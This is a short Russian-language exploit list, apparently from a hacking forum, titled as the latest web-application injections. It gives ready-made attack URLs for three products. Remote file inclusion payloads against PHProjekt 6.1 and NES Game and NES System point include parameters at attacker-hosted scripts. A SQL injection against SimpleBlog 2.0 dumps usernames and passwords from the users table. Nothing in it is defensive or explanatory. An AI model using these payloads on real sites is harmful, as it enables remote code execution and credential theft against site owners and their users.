Последние инъекции в веб-приложениях

1. PHProjekt <= 6.1 (path_pre) Multiple Remote File Include Vulnerabilities
http://site.com/[Path]/cm_navigation-33.inc.php?path_pre=http://cmd.gif?
http://site.com/[Path]/cm_navigation.inc.php?path_pre=http://cmd.gif?
http://site.com/[Path]/cm_summary.inc.php?path_pre=http://cmd.gif?

2. NES Game and NES System <= c108122 File Include Vulnerabilities
http://www.site.com/[NES_path]/phphtmllib/includes.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/localinc.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/NavTable.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[NES_path]/phphtmllib/widgets/TextNav.php?phphtmllib=[http://www.myevilsite.com/evil_scripts.txt]

3. SimpleBlog 2.0 <= SQL Injection Exploit
http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #